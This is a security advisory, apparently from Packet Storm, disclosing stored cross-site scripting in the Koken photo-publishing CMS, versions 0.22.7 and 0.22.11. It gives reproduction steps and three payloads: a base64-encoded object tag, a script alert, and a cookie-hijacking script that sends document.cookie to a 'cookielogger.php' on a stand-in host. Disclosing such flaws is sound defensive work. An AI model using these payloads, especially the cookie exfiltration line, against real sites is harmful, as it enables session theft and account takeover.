Koken 0.22.7 / 0.22.11 Cross Site Scripting

2016-11-25T00:00:00
ID PACKETSTORM:139899
Type packetstorm
Reporter Taurus Omar
Modified 2016-11-25T00:00:00

Description

                                        
                                            ` ____ _ _____   
| _ \ | | / ____|   
| |_) |_ _| |__ ___| (___ ___ ___   
| _ <| | | | '_ \ / _ \\___ \ / _ \/ __|  
| |_) | |_| | | | | (_) |___) | __/ (__   
|____/ \__,_|_| |_|\___/_____/ \___|\___|  
  
  
Document Title:  
===============  
Koken 0.22.7 & 0.22.11 Multiple Web Vulnerabilities  
  
Credits & Authors:  
==================  
TaurusOmar - @TaurusOmar_ (taurusomar@buhosec.com) [taurusomar.buhosec.com]  
  
Release Date:  
=============  
2016-24-11  
  
Product & Service Introduction:  
===============================  
  
Built for photography: Your images are your most important asset. Koken treats them with the attention they deserve by including a full-featured management interface that looks and feels like a desktop application. Work and words, together: Write about portfolio updates, inspiration, or anything that comes to mind. Images, videos, slideshows and content from Flickr, Instagram, Vimeo, SoundCloud and Twitter are a snap to display.  
Live site previewing and editing: Setup your navigation, add pages, and edit your site's color and layout with simple point-and-click controls. No HTML experience required.  
Themes and plugins: Browse, select and install themes and plugins through an integrated store. Everything downloads and installs automatically to your Koken installation.  
  
  
  
Abstract Advisory Information:  
==============================  
An independent researcher discovered multiple vulnerabilities in the official aplication My Koken 0.22.7 & 0.22.11   
  
Vulnerability Disclosure Timeline:  
==================================  
2016-24-11: Public Disclosure  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
Koken - Creative website publishing  
Product: Koken 0.22.7 & 0.22.11   
http://koken.me/  
  
Exploitation Technique:  
=======================  
Local  
  
  
Severity Level:  
===============  
medium  
  
  
Technical Details & Description:  
================================  
An application-side input validation web vulnerability has been discovered in the official Koken 0.22.7   
The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module.  
The vulnerability exists in the text box labels links in which injects the code is activated when the web server option to transfer   
  
  
Request Method(s):  
  
[+] Export  
  
Vulnerable Module(s):  
  
[+] Add Label Links  
  
Vulnerable Parameter(s):  
  
[+] Label Link Box  
  
  
Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerability can be exploited by local attackers with system user account and without user interaction.  
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.  
  
  
1. Add new user o use account admin  
2. Go to path http://tusitio.com/koken/admin/#/site/draft/theme/url:/  
3. On the menu Site > click to add Links/Footer or Links/Primary  
4. In the section Label Links add you script  
4. Successful reproduce of the persistent vulnerability!  
  
Proof of Concept (IMAGES):  
==========================  
  
1. http://i.imgur.com/AAcFkwP.png  
2. http://i.imgur.com/d7LuGLN.png  
  
Vulnerability Code  
=======================  
<a data-bind="css: { 'front-page': $data.front && front }" class="item" href="#"><span class="in"><span data-bind="attr: { class: 'icon16 label-' + ($data.auto && $data.auto === 'rss' ? 'rss' : 'chain') }, text: label" class="icon16 label-chain">VULNERABILITY_CODE</span><span class="front-mark">(front<span class="front-hidden"> / hidden</span>)</span></span></a>  
  
PoC_1: Persistent Cross Site Scripting / Path / Footer  
======================================================  
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>  
  
PoC_2: Persistent Cross Site Scripting / Path / Primaty  
=======================================================  
<script>alert(String.fromCharCode(88,83,83))</script>  
  
PoC_3:Hijacking Vulnerability / Path/ Any  
=======================================================  
<script>document.location="http://www.tusitio.com/cookielogger.php?cookie=" + document.cookie;</script>  
  
  
Security Risk:  
==============  
The security risk of the persistent input validation vulnerability in the name value is estimated as medium.   
`